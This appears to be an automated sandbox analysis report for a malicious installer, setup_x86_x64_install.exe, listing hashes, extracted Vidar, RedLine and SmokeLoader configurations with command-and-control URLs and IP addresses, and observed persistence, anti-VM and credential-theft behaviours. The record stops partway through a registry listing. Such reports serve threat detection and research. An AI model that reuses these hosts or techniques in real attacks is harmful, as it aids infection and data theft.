Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
1800s -
max time network
1807s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
12-09-2021 18:05
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
3.5MB
-
MD5
1b5154bc65145adba0a58e964265d5f2
-
SHA1
5a96fd55be61222b3e6438712979dc2a18a50b8c
-
SHA256
c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19
-
SHA512
9465da97b0986fef660e3f7725b4d4c034bef677acbe36382d95a8052c54634f004162aa3f105156e503af1b26632e47e44234ef9825b388260a6bcd310a5026
Malware Config
Extracted
http://shellloader.com/welcome
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
redline
pab123
45.14.49.169:22411
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
129c4t2
185.215.113.104:18754
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4004 3692 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1264 3692 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6364 3692 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
Processes:
resource yara_rule behavioral6/memory/4092-209-0x0000000004980000-0x000000000499F000-memory.dmp family_redline behavioral6/memory/4092-238-0x0000000004B30000-0x0000000004B4E000-memory.dmp family_redline behavioral6/memory/4880-308-0x000000000041C5DE-mapping.dmp family_redline behavioral6/memory/4880-305-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral6/memory/4400-372-0x000000000041C5E2-mapping.dmp family_redline -
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05d60bc3b96248e5.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05d60bc3b96248e5.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 4256 created 4160 4256 WerFault.exe setup.exe -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral6/memory/1912-207-0x0000000003420000-0x00000000034F1000-memory.dmp family_vidar behavioral6/memory/1912-223-0x0000000000400000-0x00000000017F2000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 49 IoCs
Processes:
powershell.exeMsiExec.exeflow pid process 141 5264 powershell.exe 325 6232 MsiExec.exe 334 6232 MsiExec.exe 340 6232 MsiExec.exe 361 6232 MsiExec.exe 383 6232 MsiExec.exe 391 6232 MsiExec.exe 392 6232 MsiExec.exe 400 6232 MsiExec.exe 411 6232 MsiExec.exe 425 6232 MsiExec.exe 427 6232 MsiExec.exe 429 6232 MsiExec.exe 434 6232 MsiExec.exe 438 6232 MsiExec.exe 445 6232 MsiExec.exe 448 6232 MsiExec.exe 469 6232 MsiExec.exe 481 6232 MsiExec.exe 483 6232 MsiExec.exe 485 6232 MsiExec.exe 489 6232 MsiExec.exe 496 6232 MsiExec.exe 500 6232 MsiExec.exe 501 6232 MsiExec.exe 502 6232 MsiExec.exe 508 6232 MsiExec.exe 509 6232 MsiExec.exe 515 6232 MsiExec.exe 517 6232 MsiExec.exe 518 6232 MsiExec.exe 520 6232 MsiExec.exe 521 6232 MsiExec.exe 523 6232 MsiExec.exe 524 6232 MsiExec.exe 525 6232 MsiExec.exe 528 6232 MsiExec.exe 529 6232 MsiExec.exe 530 6232 MsiExec.exe 532 6232 MsiExec.exe 533 6232 MsiExec.exe 534 6232 MsiExec.exe 535 6232 MsiExec.exe 536 6232 MsiExec.exe 537 6232 MsiExec.exe 538 6232 MsiExec.exe 540 6232 MsiExec.exe 541 6232 MsiExec.exe 542 6232 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
46807GHF____.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe -
Executes dropped EXE 63 IoCs
Processes:
setup_installer.exesetup_install.exeSun05640630a6aa.exeSun05532f7abc.exeSun052bbd8bebd9.exeSun05ac1b0207d3ff3b8.exeSun05d60bc3b96248e5.exeSun05899db881f67fb29.exeSun059375dac544fc4a.exeSun050462125c7d35.exeSun05fa3b4d2ae56e.exeSun054fe19a12cb3.exeSun054fe19a12cb3.tmp4078089.exeLzmwAqmV.exe4514517.exeChrome 5.exePublicDwlBrowser1100.exe2.exesetup.exe46807GHF____.exeudptest.exe7679190.exeWinHoster.exesetup_2.exesetup_2.tmp3002.exe2195400.exe7679190.exejhuuee.exeBearVpn 3.exe7844654.exe4438404.exeJypebapezhe.exe2177366.exe1090232.exesetup_2.exe3002.exesetup_2.tmppostback.exeultramediaburner.exeultramediaburner.tmpFubytajaefo.exeUltraMediaBurner.exeservices64.exeItWOC2Kah.exeGcleanerEU.exeanyname.exeinstaller.exeVidboxinc.exegcleaner.exesihost64.exeD794.exeaMBdCWawc.exeConhost.exeTgwME65w9.exe6pgwbyMucC.exe72D.exesihost.exeesvdijbesvdijbesvdijbpid process 1004 setup_installer.exe 1252 setup_install.exe 3032 Sun05640630a6aa.exe 688 Sun05532f7abc.exe 4092 Sun052bbd8bebd9.exe 1912 Sun05ac1b0207d3ff3b8.exe 3196 Sun05d60bc3b96248e5.exe 3728 Sun05899db881f67fb29.exe 3168 Sun059375dac544fc4a.exe 3768 Sun050462125c7d35.exe 3884 Sun05fa3b4d2ae56e.exe 672 Sun054fe19a12cb3.exe 2184 Sun054fe19a12cb3.tmp 2308 4078089.exe 3588 LzmwAqmV.exe 4064 4514517.exe 2672 Chrome 5.exe 3760 PublicDwlBrowser1100.exe 4100 2.exe 4160 setup.exe 4276 46807GHF____.exe 4288 udptest.exe 4312 7679190.exe 4508 WinHoster.exe 4484 setup_2.exe 4628 setup_2.tmp 4636 3002.exe 4644 2195400.exe 4880 7679190.exe 4960 jhuuee.exe 4284 BearVpn 3.exe 4752 7844654.exe 1044 4438404.exe 5116 Jypebapezhe.exe 2232 2177366.exe 4400 1090232.exe 2388 setup_2.exe 908 3002.exe 4772 setup_2.tmp 5952 postback.exe 6112 ultramediaburner.exe 5248 ultramediaburner.tmp 5156 Fubytajaefo.exe 5116 Jypebapezhe.exe 4388 UltraMediaBurner.exe 5868 services64.exe 4932 ItWOC2Kah.exe 3584 GcleanerEU.exe 6008 anyname.exe 5656 installer.exe 3064 Vidboxinc.exe 6320 gcleaner.exe 6068 sihost64.exe 4384 D794.exe 3980 aMBdCWawc.exe 5912 Conhost.exe 6996 TgwME65w9.exe 4992 6pgwbyMucC.exe 3760 72D.exe 5456 sihost.exe 212 esvdijb 6308 esvdijb 4752 esvdijb -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
72D.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 72D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 72D.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Fubytajaefo.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Fubytajaefo.exe -
Loads dropped DLL 51 IoCs
Processes:
setup_install.exeSun054fe19a12cb3.tmpsetup_2.tmpSun05ac1b0207d3ff3b8.exesetup_2.tmprundll32.exerundll32.exeinstaller.exeItWOC2Kah.exeMsiExec.exeVidboxinc.exerundll32.exeMsiExec.exeConhost.exeConhost.exepid process 1252 setup_install.exe 1252 setup_install.exe 1252 setup_install.exe 1252 setup_install.exe 1252 setup_install.exe 1252 setup_install.exe 1252 setup_install.exe 1252 setup_install.exe 2184 Sun054fe19a12cb3.tmp 4628 setup_2.tmp 1912 Sun05ac1b0207d3ff3b8.exe 1912 Sun05ac1b0207d3ff3b8.exe 4772 setup_2.tmp 1832 rundll32.exe 5400 rundll32.exe 5656 installer.exe 5656 installer.exe 4932 ItWOC2Kah.exe 4932 ItWOC2Kah.exe 5656 installer.exe 6592 MsiExec.exe 6592 MsiExec.exe 3064 Vidboxinc.exe 3064 Vidboxinc.exe 6448 rundll32.exe 6232 MsiExec.exe 6232 MsiExec.exe 6232 MsiExec.exe 6232 MsiExec.exe 6232 MsiExec.exe 6232 MsiExec.exe 6232 MsiExec.exe 6232 MsiExec.exe 6232 MsiExec.exe 6232 MsiExec.exe 5656 installer.exe 6232 MsiExec.exe 6232 MsiExec.exe 5780 Conhost.exe 5780 Conhost.exe 5780 Conhost.exe 5780 Conhost.exe 5780 Conhost.exe 5780 Conhost.exe 5780 Conhost.exe 6232 MsiExec.exe 5912 Conhost.exe 5912 Conhost.exe 5912 Conhost.exe 5912 Conhost.exe 5912 Conhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
4514517.exe46807GHF____.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 4514517.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Adobe\\Ciwyxaquly.exe\"" 46807GHF____.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
72D.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 72D.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exedescription ioc process File opened (read-only) \??\A: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 ip-api.com 106 ip-api.com -
Drops file in System32 directory 16 IoCs
Processes:
powershell.exesvchost.exesvchost.exedescription ioc process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\Tasks\Azure-Update-Task svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent DECC8C94FB8AB16B svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
72D.exepid process 3760 72D.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
7679190.exeJypebapezhe.exesvchost.exepostback.exeservices64.exedescription pid process target process PID 4312 set thread context of 4880 4312 7679190.exe 7679190.exe PID 5116 set thread context of 4400 5116 Jypebapezhe.exe 1090232.exe PID 2740 set thread context of 1104 2740 svchost.exe svchost.exe PID 5952 set thread context of 5316 5952 postback.exe explorer.exe PID 5868 set thread context of 4552 5868 services64.exe explorer.exe -
Drops file in Program Files directory 18 IoCs
Processes:
msiexec.exesetup_2.tmpultramediaburner.tmp46807GHF____.exedescription ioc process File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-NQOVG.tmp ultramediaburner.tmp File created C:\Program Files (x86)\Adobe\Ciwyxaquly.exe 46807GHF____.exe File created C:\Program Files (x86)\Adobe\Ciwyxaquly.exe.config 46807GHF____.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-ITOD4.tmp setup_2.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-D1TC8.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\VRAQFEKBZR\ultramediaburner.exe 46807GHF____.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\VRAQFEKBZR\ultramediaburner.exe.config 46807GHF____.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe -
Drops file in Windows directory 48 IoCs
Processes:
msiexec.exepowershell.exeMicrosoftEdge.exepowershell.exesvchost.exeWerFault.exedescription ioc process File opened for modification C:\Windows\Installer\MSIB25A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB2D9.tmp msiexec.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSICBE0.tmp msiexec.exe File created C:\Windows\Installer\f75abc4.msi msiexec.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\Installer\MSIB7C0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB3A6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBD52.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\Installer\MSIB318.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB2A9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBA43.tmp msiexec.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\Installer\f75abc1.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIB8AB.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSICC5E.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\Installer\MSIB443.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB6F4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC9AA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC9EA.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSID0D4.tmp msiexec.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\f75abc1.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIAF0D.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIBCC4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC5D0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC8DE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICAE5.tmp msiexec.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4904 3884 WerFault.exe Sun05fa3b4d2ae56e.exe 4888 4100 WerFault.exe 2.exe 5084 4312 WerFault.exe 7679190.exe 4176 4160 WerFault.exe setup.exe 4576 3884 WerFault.exe Sun05fa3b4d2ae56e.exe 768 4160 WerFault.exe setup.exe 3628 3884 WerFault.exe Sun05fa3b4d2ae56e.exe 1328 4160 WerFault.exe setup.exe 4168 3884 WerFault.exe Sun05fa3b4d2ae56e.exe 4608 4160 WerFault.exe setup.exe 3952 4160 WerFault.exe setup.exe 4040 4160 WerFault.exe setup.exe 4256 4160 WerFault.exe setup.exe 5136 3884 WerFault.exe Sun05fa3b4d2ae56e.exe 1328 2308 WerFault.exe 4078089.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Sun05532f7abc.exeesvdijbesvdijbesvdijbdescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun05532f7abc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI esvdijb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI esvdijb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI esvdijb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI esvdijb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun05532f7abc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun05532f7abc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI esvdijb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI esvdijb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI esvdijb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI esvdijb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI esvdijb -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Sun05ac1b0207d3ff3b8.exesvchost.exeItWOC2Kah.exeVidboxinc.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Sun05ac1b0207d3ff3b8.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ItWOC2Kah.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ItWOC2Kah.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Vidboxinc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Vidboxinc.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Sun05ac1b0207d3ff3b8.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2160 schtasks.exe 5092 schtasks.exe 2844 schtasks.exe 5588 schtasks.exe -
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid process 6564 timeout.exe 4436 timeout.exe 1120 timeout.exe 4168 timeout.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4372 taskkill.exe 5864 taskkill.exe 5212 taskkill.exe 5632 taskkill.exe 2888 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 23 IoCs
Processes:
svchost.exesvchost.exemsiexec.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created 